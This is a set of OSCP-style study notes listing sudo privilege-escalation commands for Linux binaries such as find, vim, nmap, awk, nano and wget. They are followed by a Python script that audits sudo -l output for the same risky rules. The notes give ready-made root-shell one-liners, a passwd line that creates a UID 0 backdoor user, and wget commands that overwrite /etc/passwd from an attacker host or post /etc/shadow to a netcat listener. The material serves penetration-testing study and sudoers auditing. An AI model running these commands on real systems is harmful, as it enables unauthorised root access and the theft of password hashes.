OSCP Notes
Exploiting SUDO Users

First thing first

To exploit a sudo entry, you first need to find which commands you are allowed to run with sudo:

sudo -l
Escalate privileges to root using the command you are allowed to run:

Find

sudo find /etc/passwd -exec /bin/sh \;

sudo find /bin -name nano -exec /bin/sh \;

Vim

sudo vim -c '!sh'

Nmap

# Old way (interactive mode, removed in newer Nmap versions)
sudo nmap --interactive
nmap> !sh
sh-4.1#

# Latest way (NSE script)
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

Man

sudo man man
# type !sh and press Enter

Less/More

sudo less /etc/hosts
# type !sh and press Enter

sudo more /etc/hosts
# type !sh and press Enter

awk

sudo awk 'BEGIN {system("/bin/sh")}'

nano

sudo nano /etc/passwd

Add the following line to /etc/passwd to create a user with UID 0 (root privileges):

ayed:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash

su ayed

wget

    Copy the target's /etc/passwd file to the attacker machine.
    Modify the file and append the user entry from the previous step:
    ayed:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
    Host the modified passwd file with any web server.
    Then, on the target, overwrite /etc/passwd and switch to the new user:
    sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
    su ayed

Note: to dump a file from the target, such as root's SSH key or the shadow file, post it to a listener on the attacker machine:

sudo wget --post-file=/etc/shadow 192.168.56.1:8080

# on the attacker machine, started before the wget above
nc -lvp 8080

apache

sudo apache2 -f /etc/shadow
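As an added defensive counterpart (not part of the original notes), this Python script parses `sudo -l` output and flags rules that grant ALL or any of the binaries listed above, so an administrator can audit sudoers for the same shell escapes. The `sudo -l` sample, the user `bob` and the host `target` are constructed.

```python
import os
import re

# Binaries the notes above show escaping to a root shell when allowed via sudo.
SHELL_ESCAPE_BINARIES = {"find", "vim", "nmap", "man", "less", "more", "awk",
                         "nano", "wget", "apache2"}

# Constructed sample of `sudo -l` output (not captured from a real host).
SAMPLE_SUDO_L = """Matching Defaults entries for bob on target:
    env_reset, mail_badpass

User bob may run the following commands on target:
    (root) NOPASSWD: /usr/bin/find, /usr/bin/vim
    (root) /usr/bin/nmap, /usr/bin/apt-get
    (ALL : ALL) ALL
"""

# One rule line: "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)")

def parse_sudo_l(output):
    """Return (runas, tags, command_spec) tuples from the rules section of `sudo -l`."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        for spec in m.group("cmds").split(","):
            if spec.strip():
                rules.append((m.group("runas"), m.group("tags").strip(), spec.strip()))
    return rules

def audit_sudo_rules(output):
    """Flag rules granting ALL or a binary with a known shell escape."""
    findings = []
    for runas, tags, spec in parse_sudo_l(output):
        if spec == "ALL":
            findings.append((spec, "unrestricted sudo"))
            continue
        binary = os.path.basename(spec.split()[0])  # first token is the program path
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append((spec, f"{binary} can spawn a shell as {runas}; remove or replace"))
    return findings

if __name__ == "__main__":
    for spec, reason in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"{spec:20} {reason}")
```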